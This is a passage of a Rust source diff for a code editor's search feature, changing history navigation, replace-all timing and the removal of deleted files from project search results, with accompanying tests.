+2745,13 @@ mod tests { assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); - // Next history query after the latest should set the query to the empty string. + // Next history query after the latest should preserve the current query. 
search_bar.update_in(cx, |search_bar, window, cx| { search_bar.next_history_query(&NextHistoryQuery, window, cx); }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), ""); + assert_eq!(search_bar.query(cx), "c"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); search_bar.update_in(cx, |search_bar, window, cx| { @@ -2732,17 +2759,17 @@ mod tests { }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), ""); + assert_eq!(search_bar.query(cx), "c"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); - // First previous query for empty current query should set the query to the latest. + // Previous query should navigate backwards through history. search_bar.update_in(cx, |search_bar, window, cx| { search_bar.previous_history_query(&PreviousHistoryQuery, window, cx); }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), "c"); + assert_eq!(search_bar.query(cx), "b"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); @@ -2752,7 +2779,7 @@ mod tests { }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), "b"); + assert_eq!(search_bar.query(cx), "a"); assert_eq!(search_bar.search_options, SearchOptions::CASE_SENSITIVE); }); @@ -2833,11 +2860,71 @@ mod tests { }); cx.background_executor.run_until_parked(); search_bar.update(cx, |search_bar, cx| { - assert_eq!(search_bar.query(cx), ""); + assert_eq!(search_bar.query(cx), "ba"); assert_eq!(search_bar.search_options, SearchOptions::NONE); }); } + #[perf] + #[gpui::test] + async fn test_search_query_history_autoscroll(cx: &mut TestAppContext) { + let (_editor, search_bar, cx) = init_test(cx); + + // Add a long multi-line query that exceeds the editor's max + // visible height (4 lines), 
then a short query. + let long_query = "line1\nline2\nline3\nline4\nline5\nline6"; + search_bar + .update_in(cx, |search_bar, window, cx| { + search_bar.search(long_query, None, true, window, cx) + }) + .await + .unwrap(); + search_bar + .update_in(cx, |search_bar, window, cx| { + search_bar.search("short", None, true, window, cx) + }) + .await + .unwrap(); + + // Navigate back to the long entry. Since "short" is single-line, + // the history navigation is allowed. + search_bar.update_in(cx, |search_bar, window, cx| { + search_bar.previous_history_query(&PreviousHistoryQuery, window, cx); + }); + cx.background_executor.run_until_parked(); + search_bar.update(cx, |search_bar, cx| { + assert_eq!(search_bar.query(cx), long_query); + }); + + // The cursor should be scrolled into view despite the content + // exceeding the editor's max visible height. + search_bar.update_in(cx, |search_bar, window, cx| { + let snapshot = search_bar + .query_editor + .update(cx, |editor, cx| editor.snapshot(window, cx)); + let cursor_row = search_bar + .query_editor + .read(cx) + .selections + .newest_display(&snapshot) + .head() + .row(); + let scroll_top = search_bar + .query_editor + .update(cx, |editor, cx| editor.scroll_position(cx).y); + let visible_lines = search_bar + .query_editor + .read(cx) + .visible_line_count() + .unwrap_or(0.0); + let scroll_bottom = scroll_top + visible_lines; + assert!( + (cursor_row.0 as f64) < scroll_bottom, + "cursor row {cursor_row:?} should be visible (scroll range {scroll_top}..{scroll_bottom})" + ); + }); + } + #[perf] #[gpui::test] async fn test_replace_simple(cx: &mut TestAppContext) { @@ -3116,6 +3203,47 @@ mod tests { .await; } + #[gpui::test] + async fn test_deploy_replace_focuses_replacement_editor(cx: &mut TestAppContext) { + init_globals(cx); + let (editor, search_bar, cx) = init_test(cx); + + editor.update_in(cx, |editor, window, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_display_ranges([ 
+ DisplayPoint::new(DisplayRow(0), 8)..DisplayPoint::new(DisplayRow(0), 16) + ]) + }); + }); + + search_bar.update_in(cx, |search_bar, window, cx| { + search_bar.deploy( + &Deploy { + focus: true, + replace_enabled: true, + selection_search_enabled: false, + }, + window, + cx, + ); + }); + cx.run_until_parked(); + + search_bar.update_in(cx, |search_bar, window, cx| { + assert!( + search_bar + .replacement_editor + .focus_handle(cx) + .is_focused(window), + "replacement editor should be focused when deploying replace with a selection", + ); + assert!( + !search_bar.query_editor.focus_handle(cx).is_focused(window), + "search editor should not be focused when replacement editor is focused", + ); + }); + } + #[perf] #[gpui::test] async fn test_find_matches_in_selections_singleton_buffer_multiple_selections( @@ -3281,17 +3409,15 @@ mod tests { assert_eq!(initial_location, ToolbarItemLocation::Secondary); - let mut events = cx.events(&search_bar); + let mut events = cx.events::(&search_bar); search_bar.update_in(cx, |search_bar, window, cx| { search_bar.dismiss(&Dismiss, window, cx); }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Hidden - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Hidden)) ); search_bar.update_in(cx, |search_bar, window, cx| { @@ -3299,10 +3425,8 @@ mod tests { }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Secondary - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Secondary)) ); } @@ -3317,17 +3441,15 @@ mod tests { assert_eq!(initial_location, ToolbarItemLocation::PrimaryLeft); - let mut events = cx.events(&search_bar); + let mut events = cx.events::(&search_bar); search_bar.update_in(cx, |search_bar, window, cx| { search_bar.dismiss(&Dismiss, window, cx); }); assert_eq!( - events.try_next().unwrap(), - 
Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::PrimaryLeft - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::PrimaryLeft)) ); search_bar.update_in(cx, |search_bar, window, cx| { @@ -3335,10 +3457,8 @@ mod tests { }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::PrimaryLeft - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::PrimaryLeft)) ); } @@ -3357,17 +3477,15 @@ mod tests { assert_eq!(initial_location, ToolbarItemLocation::Hidden); - let mut events = cx.events(&search_bar); + let mut events = cx.events::(&search_bar); search_bar.update_in(cx, |search_bar, window, cx| { search_bar.dismiss(&Dismiss, window, cx); }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Hidden - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Hidden)) ); search_bar.update_in(cx, |search_bar, window, cx| { @@ -3375,10 +3493,8 @@ mod tests { }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Secondary - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Secondary)) ); } @@ -3431,7 +3547,16 @@ mod tests { // Manually unfold one buffer (simulating a chevron click) let first_buffer_id = editor.read_with(cx, |editor, cx| { - editor.buffer().read(cx).excerpt_buffer_ids()[0] + editor + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .nth(0) + .unwrap() + .context + .start + .buffer_id }); editor.update_in(cx, |editor, _window, cx| { editor.unfold_buffer(first_buffer_id, cx); @@ -3445,7 +3570,16 @@ mod tests { // Manually unfold the second buffer too let second_buffer_id = editor.read_with(cx, |editor, cx| { - editor.buffer().read(cx).excerpt_buffer_ids()[1] + editor + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .nth(1) + 
.unwrap() + .context + .start + .buffer_id }); editor.update_in(cx, |editor, _window, cx| { editor.unfold_buffer(second_buffer_id, cx); diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index 9b23c96259e4933bc1660af960b508c0678fe767..1bccf1ae52fb2c52a8d01e53aabb1b3ff5c7c16f 100644 --- a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -4,8 +4,8 @@ use crate::{ ToggleCaseSensitive, ToggleIncludeIgnored, ToggleRegex, ToggleReplace, ToggleWholeWord, buffer_search::Deploy, search_bar::{ - ActionButtonState, alignment_element, input_base_styles, render_action_button, - render_text_input, + ActionButtonState, HistoryNavigationDirection, alignment_element, input_base_styles, + render_action_button, render_text_input, should_navigate_history, }, }; use anyhow::Context as _; @@ -27,6 +27,7 @@ use gpui::{ use itertools::Itertools; use language::{Buffer, Language}; use menu::Confirm; +use multi_buffer; use project::{ Project, ProjectPath, SearchResults, search::{SearchInputKind, SearchQuery}, @@ -239,6 +240,7 @@ pub struct ProjectSearch { search_history_cursor: SearchHistoryCursor, search_included_history_cursor: SearchHistoryCursor, search_excluded_history_cursor: SearchHistoryCursor, + _excerpts_subscription: Subscription, } #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] @@ -264,6 +266,7 @@ pub struct ProjectSearchView { excluded_files_editor: Entity, filters_enabled: bool, replace_enabled: bool, + pending_replace_all: bool, included_opened_only: bool, regex_language: Option>, _subscriptions: Vec, @@ -283,10 +286,12 @@ pub struct ProjectSearchBar { impl ProjectSearch { pub fn new(project: Entity, cx: &mut Context) -> Self { let capability = project.read(cx).capability(); + let excerpts = cx.new(|_| MultiBuffer::new(capability)); + let subscription = Self::subscribe_to_excerpts(&excerpts, cx); Self { project, - excerpts: cx.new(|_| MultiBuffer::new(capability)), + excerpts, pending_search: 
Default::default(), match_ranges: Default::default(), active_query: None, @@ -297,27 +302,76 @@ impl ProjectSearch { search_history_cursor: Default::default(), search_included_history_cursor: Default::default(), search_excluded_history_cursor: Default::default(), + _excerpts_subscription: subscription, } } fn clone(&self, cx: &mut Context) -> Entity { - cx.new(|cx| Self { - project: self.project.clone(), - excerpts: self + cx.new(|cx| { + let excerpts = self .excerpts - .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx))), - pending_search: Default::default(), - match_ranges: self.match_ranges.clone(), - active_query: self.active_query.clone(), - last_search_query_text: self.last_search_query_text.clone(), - search_id: self.search_id, - no_results: self.no_results, - limit_reached: self.limit_reached, - search_history_cursor: self.search_history_cursor.clone(), - search_included_history_cursor: self.search_included_history_cursor.clone(), - search_excluded_history_cursor: self.search_excluded_history_cursor.clone(), + .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx))); + let subscription = Self::subscribe_to_excerpts(&excerpts, cx); + + Self { + project: self.project.clone(), + excerpts, + pending_search: Default::default(), + match_ranges: self.match_ranges.clone(), + active_query: self.active_query.clone(), + last_search_query_text: self.last_search_query_text.clone(), + search_id: self.search_id, + no_results: self.no_results, + limit_reached: self.limit_reached, + search_history_cursor: self.search_history_cursor.clone(), + search_included_history_cursor: self.search_included_history_cursor.clone(), + search_excluded_history_cursor: self.search_excluded_history_cursor.clone(), + _excerpts_subscription: subscription, + } + }) + } + fn subscribe_to_excerpts( + excerpts: &Entity, + cx: &mut Context, + ) -> Subscription { + cx.subscribe(excerpts, |this, _, event, cx| { + if matches!(event, multi_buffer::Event::FileHandleChanged) { + 
this.remove_deleted_buffers(cx); + } }) } + + fn remove_deleted_buffers(&mut self, cx: &mut Context) { + let deleted_buffer_ids = self + .excerpts + .read(cx) + .all_buffers_iter() + .filter(|buffer| { + buffer + .read(cx) + .file() + .is_some_and(|file| file.disk_state().is_deleted()) + }) + .map(|buffer| buffer.read(cx).remote_id()) + .collect::>(); + + if deleted_buffer_ids.is_empty() { + return; + } + + let snapshot = self.excerpts.update(cx, |excerpts, cx| { + for buffer_id in deleted_buffer_ids { + excerpts.remove_excerpts_for_buffer(buffer_id, cx); + } + excerpts.snapshot(cx) + }); + + self.match_ranges + .retain(|range| snapshot.anchor_to_buffer_anchor(range.start).is_some()); + + cx.notify(); + } + fn cursor(&self, kind: SearchInputKind) -> &SearchHistoryCursor { match kind { SearchInputKind::Query => &self.search_history_cursor, @@ -735,6 +789,9 @@ impl ProjectSearchView { } fn replace_next(&mut self, _: &ReplaceNext, window: &mut Window, cx: &mut Context) { + if self.entity.read(cx).pending_search.is_some() { + return; + } if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text && self.query_editor.read(cx).text(cx) != *last_search_query_text { @@ -762,14 +819,24 @@ impl ProjectSearchView { self.select_match(Direction::Next, window, cx) } } + fn replace_all(&mut self, _: &ReplaceAll, window: &mut Window, cx: &mut Context) { - if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text - && self.query_editor.read(cx).text(cx) != *last_search_query_text - { - // search query has changed, restart search and bail + if self.entity.read(cx).pending_search.is_some() { + self.pending_replace_all = true; + return; + } + let query_text = self.query_editor.read(cx).text(cx); + let query_is_stale = + self.entity.read(cx).last_search_query_text.as_deref() != Some(query_text.as_str()); + if query_is_stale { + self.pending_replace_all = true; self.search(cx); + if self.entity.read(cx).pending_search.is_none() { + 
self.pending_replace_all = false; + } return; } + self.pending_replace_all = false; if self.active_match_index.is_none() { return; } @@ -858,8 +925,9 @@ impl ProjectSearchView { })); let query_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); + let mut editor = Editor::auto_height(1, 4, window, cx); editor.set_placeholder_text("Search all files…", window, cx); + editor.set_use_autoclose(false); editor.set_text(query_text, window, cx); editor }); @@ -881,7 +949,7 @@ impl ProjectSearchView { }), ); let replacement_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); + let mut editor = Editor::auto_height(1, 4, window, cx); editor.set_placeholder_text("Replace in project…", window, cx); if let Some(text) = replacement_text { editor.set_text(text, window, cx); @@ -981,6 +1049,7 @@ impl ProjectSearchView { excluded_files_editor, filters_enabled, replace_enabled: false, + pending_replace_all: false, included_opened_only: false, regex_language: None, _subscriptions: subscriptions, @@ -1474,8 +1543,9 @@ impl ProjectSearchView { SearchInputKind::Exclude => &self.excluded_files_editor, }; - editor.update(cx, |included_editor, cx| { - included_editor.set_text(text, window, cx) + editor.update(cx, |editor, cx| { + editor.set_text(text, window, cx); + editor.request_autoscroll(Autoscroll::fit(), cx); }); } @@ -1521,6 +1591,10 @@ impl ProjectSearchView { cx.emit(ViewEvent::UpdateTab); cx.notify(); + + if self.pending_replace_all && self.entity.read(cx).pending_search.is_none() { + self.replace_all(&ReplaceAll, window, cx); + } } fn update_match_index(&mut self, cx: &mut Context) { @@ -1583,9 +1657,7 @@ impl ProjectSearchView { ) .child( Button::new("filter-paths", "Include/exclude specific paths") - .icon(IconName::Filter) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::Filter).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in(&ToggleFilters, &focus_handle, cx)) 
.on_click(|_event, window, cx| { window.dispatch_action(ToggleFilters.boxed_clone(), cx) @@ -1593,9 +1665,7 @@ impl ProjectSearchView { ) .child( Button::new("find-replace", "Find and replace") - .icon(IconName::Replace) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::Replace).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in(&ToggleReplace, &focus_handle, cx)) .on_click(|_event, window, cx| { window.dispatch_action(ToggleReplace.boxed_clone(), cx) @@ -1603,9 +1673,7 @@ impl ProjectSearchView { ) .child( Button::new("regex", "Match with regex") - .icon(IconName::Regex) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::Regex).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in(&ToggleRegex, &focus_handle, cx)) .on_click(|_event, window, cx| { window.dispatch_action(ToggleRegex.boxed_clone(), cx) @@ -1613,9 +1681,7 @@ impl ProjectSearchView { ) .child( Button::new("match-case", "Match case") - .icon(IconName::CaseSensitive) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::CaseSensitive).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in( &ToggleCaseSensitive, &focus_handle, @@ -1627,9 +1693,7 @@ impl ProjectSearchView { ) .child( Button::new("match-whole-words", "Match whole words") - .icon(IconName::WholeWord) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::WholeWord).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in( &ToggleWholeWord, &focus_handle, @@ -1926,6 +1990,11 @@ impl ProjectSearchBar { ), ] { if editor.focus_handle(cx).is_focused(window) { + if !should_navigate_history(&editor, HistoryNavigationDirection::Next, cx) { + cx.propagate(); + return; + } + let new_query = search_view.entity.update(cx, |model, cx| { let project = model.project.clone(); @@ -1935,13 +2004,14 @@ impl ProjectSearchBar { 
.next(model.cursor_mut(kind)) .map(str::to_string) }) { - new_query + Some(new_query) } else { - model.cursor_mut(kind).reset(); - String::new() + model.cursor_mut(kind).take_draft() } }); - search_view.set_search_editor(kind, &new_query, window, cx); + if let Some(new_query) = new_query { + search_view.set_search_editor(kind, &new_query, window, cx); + } } } }); @@ -1968,6 +2038,15 @@ impl ProjectSearchBar { ), ] { if editor.focus_handle(cx).is_focused(window) { + if !should_navigate_history( + &editor, + HistoryNavigationDirection::Previous, + cx, + ) { + cx.propagate(); + return; + } + if editor.read(cx).text(cx).is_empty() && let Some(new_query) = search_view .entity @@ -1982,12 +2061,13 @@ impl ProjectSearchBar { return; } + let current_query = editor.read(cx).text(cx); if let Some(new_query) = search_view.entity.update(cx, |model, cx| { let project = model.project.clone(); project.update(cx, |project, _| { project .search_history_mut(kind) - .previous(model.cursor_mut(kind)) + .previous(model.cursor_mut(kind), ¤t_query) .map(str::to_string) }) }) { @@ -2086,7 +2166,11 @@ impl Render for ProjectSearchBar { .on_action( cx.listener(|this, action, window, cx| this.next_history_query(action, window, cx)), ) - .child(render_text_input(&search.query_editor, color_override, cx)) + .child(div().flex_1().py_1().child(render_text_input( + &search.query_editor, + color_override, + cx, + ))) .child( h_flex() .gap_1() @@ -2244,18 +2328,22 @@ impl Render for ProjectSearchBar { .child(mode_column); let replace_line = search.replace_enabled.then(|| { - let replace_column = input_base_styles(InputPanel::Replacement) - .child(render_text_input(&search.replacement_editor, None, cx)); + let replace_column = input_base_styles(InputPanel::Replacement).child( + div().flex_1().py_1().child(render_text_input( + &search.replacement_editor, + None, + cx, + )), + ); let focus_handle = search.replacement_editor.read(cx).focus_handle(cx); - let replace_actions = h_flex() .min_w_64() 
.gap_1() .child(render_action_button( "project-search-replace-button", IconName::ReplaceNext, - Default::default(), + is_search_underway.then_some(ActionButtonState::Disabled), "Replace Next Match", &ReplaceNext, focus_handle.clone(), @@ -2519,7 +2607,7 @@ pub mod tests { use gpui::{Action, TestAppContext, VisualTestContext, WindowHandle}; use language::{FakeLspAdapter, rust_lang}; use pretty_assertions::assert_eq; - use project::FakeFs; + use project::{FakeFs, Fs}; use serde_json::json; use settings::{ InlayHintSettingsContent, SettingsStore, ThemeColorsContent, ThemeStyleContent, @@ -2893,7 +2981,13 @@ pub mod tests { .read(cx) .buffer() .read(cx) - .excerpt_buffer_ids()[0] + .snapshot(cx) + .excerpts() + .next() + .unwrap() + .context + .start + .buffer_id }) .expect("should read buffer ids"); @@ -3845,7 +3939,7 @@ pub mod tests { }) .unwrap(); - // Next history query after the latest should set the query to the empty string. + // Next history query after the latest should preserve the current query. window .update(cx, |_, window, cx| { search_bar.update(cx, |search_bar, cx| { @@ -3857,7 +3951,10 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), ""); + assert_eq!( + search_view.query_editor.read(cx).text(cx), + "JUST_TEXT_INPUT" + ); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) @@ -3873,13 +3970,16 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), ""); + assert_eq!( + search_view.query_editor.read(cx).text(cx), + "JUST_TEXT_INPUT" + ); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) .unwrap(); - // First previous query for empty current query should set the query to the latest submitted one. + // Previous query should navigate backwards through history. 
window .update(cx, |_, window, cx| { search_bar.update(cx, |search_bar, cx| { @@ -3891,7 +3991,7 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE"); + assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO"); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) @@ -3909,7 +4009,7 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO"); + assert_eq!(search_view.query_editor.read(cx).text(cx), "ONE"); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) @@ -4063,11 +4163,75 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), ""); + assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW"); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) .unwrap(); + + // Typing text without running a search, then navigating history, should allow + // restoring the draft when pressing next past the end. + window + .update(cx, |_, window, cx| { + search_view.update(cx, |search_view, cx| { + search_view.query_editor.update(cx, |query_editor, cx| { + query_editor.set_text("unsaved draft", window, cx) + }); + }) + }) + .unwrap(); + cx.background_executor.run_until_parked(); + + // Navigate up into history — the draft should be stashed. + window + .update(cx, |_, window, cx| { + search_bar.update(cx, |search_bar, cx| { + search_bar.focus_search(window, cx); + search_bar.previous_history_query(&PreviousHistoryQuery, window, cx); + }); + }) + .unwrap(); + window + .update(cx, |_, _, cx| { + search_view.update(cx, |search_view, cx| { + assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE"); + }); + }) + .unwrap(); + + // Navigate forward through history. 
+ window + .update(cx, |_, window, cx| { + search_bar.update(cx, |search_bar, cx| { + search_bar.focus_search(window, cx); + search_bar.next_history_query(&NextHistoryQuery, window, cx); + }); + }) + .unwrap(); + window + .update(cx, |_, _, cx| { + search_view.update(cx, |search_view, cx| { + assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW"); + }); + }) + .unwrap(); + + // Navigate past the end — the draft should be restored. + window + .update(cx, |_, window, cx| { + search_bar.update(cx, |search_bar, cx| { + search_bar.focus_search(window, cx); + search_bar.next_history_query(&NextHistoryQuery, window, cx); + }); + }) + .unwrap(); + window + .update(cx, |_, _, cx| { + search_view.update(cx, |search_view, cx| { + assert_eq!(search_view.query_editor.read(cx).text(cx), "unsaved draft"); + }); + }) + .unwrap(); } #[perf] @@ -4253,9 +4417,6 @@ pub mod tests { cx.background_executor.run_until_parked(); select_next_history_item(&search_bar_2, cx); - assert_eq!(active_query(&search_view_2, cx), ""); - - select_prev_history_item(&search_bar_2, cx); assert_eq!(active_query(&search_view_2, cx), "THREE"); select_prev_history_item(&search_bar_2, cx); @@ -4267,6 +4428,9 @@ pub mod tests { select_prev_history_item(&search_bar_2, cx); assert_eq!(active_query(&search_view_2, cx), "ONE"); + select_prev_history_item(&search_bar_2, cx); + assert_eq!(active_query(&search_view_2, cx), "ONE"); + // Search view 1 should now see the query from search view 2. 
assert_eq!(active_query(&search_view_1, cx), "ONE"); @@ -4278,7 +4442,7 @@ pub mod tests { assert_eq!(active_query(&search_view_2, cx), "THREE"); select_next_history_item(&search_bar_2, cx); - assert_eq!(active_query(&search_view_2, cx), ""); + assert_eq!(active_query(&search_view_2, cx), "THREE"); select_next_history_item(&search_bar_1, cx); assert_eq!(active_query(&search_view_1, cx), "TWO"); @@ -4287,7 +4451,7 @@ pub mod tests { assert_eq!(active_query(&search_view_1, cx), "THREE"); select_next_history_item(&search_bar_1, cx); - assert_eq!(active_query(&search_view_1, cx), ""); + assert_eq!(active_query(&search_view_1, cx), "THREE"); } #[perf] @@ -4887,12 +5051,97 @@ pub mod tests { .unwrap(); } + #[gpui::test] + async fn test_deleted_file_removed_from_search_results(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/dir"), + json!({ + "file_a.txt": "hello world", + "file_b.txt": "hello universe", + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let window = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let search = cx.new(|cx| ProjectSearch::new(project.clone(), cx)); + let search_view = cx.add_window(|window, cx| { + ProjectSearchView::new(workspace.downgrade(), search.clone(), window, cx, None) + }); + + perform_search(search_view, "hello", cx); + + search_view + .update(cx, |search_view, _window, cx| { + let match_count = search_view.entity.read(cx).match_ranges.len(); + assert_eq!(match_count, 2, "Should have matches from both files"); + }) + .unwrap(); + + // Delete file_b.txt + fs.remove_file( + path!("/dir/file_b.txt").as_ref(), + fs::RemoveOptions::default(), + ) + .await + .unwrap(); + cx.run_until_parked(); + + // Verify deleted file's results are removed proactively + search_view + .update(cx, 
|search_view, _window, cx| { + let results_text = search_view + .results_editor + .update(cx, |editor, cx| editor.display_text(cx)); + assert!( + !results_text.contains("universe"), + "Deleted file's content should be removed from results, got: {results_text}" + ); + assert!( + results_text.contains("world"), + "Remaining file's content should still be present, got: {results_text}" + ); + }) + .unwrap(); + + // Re-run the search and verify deleted file stays gone + perform_search(search_view, "hello", cx); + + search_view + .update(cx, |search_view, _window, cx| { + let results_text = search_view + .results_editor + .update(cx, |editor, cx| editor.display_text(cx)); + assert!( + !results_text.contains("universe"), + "Deleted file should not reappear after re-search, got: {results_text}" + ); + assert!( + results_text.contains("world"), + "Remaining file should still be found, got: {results_text}" + ); + assert_eq!( + search_view.entity.read(cx).match_ranges.len(), + 1, + "Should only have match from the remaining file" + ); + }) + .unwrap(); + } + fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings = SettingsStore::test(cx); cx.set_global(settings); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); diff --git a/crates/search/src/search.rs b/crates/search/src/search.rs index d2104492bebf529821f8ad8571fd3fbb8bdbc69e..8edcdd600bd352d4e33c0c8c1ec9aed3f427c71c 100644 --- a/crates/search/src/search.rs +++ b/crates/search/src/search.rs @@ -85,7 +85,7 @@ pub enum SearchOption { Backwards, } -pub(crate) enum SearchSource<'a, 'b> { +pub enum SearchSource<'a, 'b> { Buffer, Project(&'a Context<'b, ProjectSearchBar>), } @@ -126,7 +126,7 @@ impl SearchOption { } } - pub(crate) fn as_button( + pub fn as_button( &self, active: SearchOptions, search_source: SearchSource, diff --git a/crates/search/src/search_bar.rs b/crates/search/src/search_bar.rs index 
690b2eb927ce7384b7e6e313aeb5c825c544cdc9..a4757631a188752aed7cc631d987a22cd57b06c6 100644 --- a/crates/search/src/search_bar.rs +++ b/crates/search/src/search_bar.rs @@ -1,10 +1,37 @@ -use editor::{Editor, EditorElement, EditorStyle}; -use gpui::{Action, Entity, FocusHandle, Hsla, IntoElement, TextStyle}; +use editor::{Editor, EditorElement, EditorStyle, MultiBufferOffset, ToOffset}; +use gpui::{Action, App, Entity, FocusHandle, Hsla, IntoElement, TextStyle}; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IconButton, IconButtonShape}; use ui::{Tooltip, prelude::*}; +pub(super) enum HistoryNavigationDirection { + Previous, + Next, +} + +pub(super) fn should_navigate_history( + editor: &Entity, + direction: HistoryNavigationDirection, + cx: &App, +) -> bool { + let editor_ref = editor.read(cx); + let snapshot = editor_ref.buffer().read(cx).snapshot(cx); + if snapshot.max_point().row == 0 { + return true; + } + let selections = editor_ref.selections.disjoint_anchors(); + if let [selection] = selections { + let offset = selection.end.to_offset(&snapshot); + match direction { + HistoryNavigationDirection::Previous => offset == MultiBufferOffset(0), + HistoryNavigationDirection::Next => offset == snapshot.len(), + } + } else { + true + } +} + pub(super) enum ActionButtonState { Disabled, Toggled, @@ -43,7 +70,7 @@ pub(crate) fn input_base_styles(border_color: Hsla, map: impl FnOnce(Div) -> Div h_flex() .map(map) .min_w_32() - .h_8() + .min_h_8() .pl_2() .pr_1() .border_1() diff --git a/crates/search/src/search_status_button.rs b/crates/search/src/search_status_button.rs index 712a322c1094f28ea601d6d170e7be1e395e25f7..5faab32d424df832f55d18059b4485c77eaccdfb 100644 --- a/crates/search/src/search_status_button.rs +++ b/crates/search/src/search_status_button.rs @@ -1,15 +1,20 @@ use editor::EditorSettings; +use gpui::FocusHandle; use settings::Settings as _; use ui::{ButtonCommon, Clickable, Context, Render, Tooltip, Window, 
prelude::*}; use workspace::{ItemHandle, StatusItemView}; pub const SEARCH_ICON: IconName = IconName::MagnifyingGlass; -pub struct SearchButton; +pub struct SearchButton { + pane_item_focus_handle: Option, +} impl SearchButton { pub fn new() -> Self { - Self {} + Self { + pane_item_focus_handle: None, + } } } @@ -21,11 +26,25 @@ impl Render for SearchButton { return button.hidden(); } + let focus_handle = self.pane_item_focus_handle.clone(); button.child( IconButton::new("project-search-indicator", SEARCH_ICON) .icon_size(IconSize::Small) - .tooltip(|_window, cx| { - Tooltip::for_action("Project Search", &workspace::DeploySearch::default(), cx) + .tooltip(move |_window, cx| { + if let Some(focus_handle) = &focus_handle { + Tooltip::for_action_in( + "Project Search", + &workspace::DeploySearch::default(), + focus_handle, + cx, + ) + } else { + Tooltip::for_action( + "Project Search", + &workspace::DeploySearch::default(), + cx, + ) + } }) .on_click(cx.listener(|_this, _, window, cx| { window.dispatch_action(Box::new(workspace::DeploySearch::default()), cx); @@ -37,9 +56,10 @@ impl Render for SearchButton { impl StatusItemView for 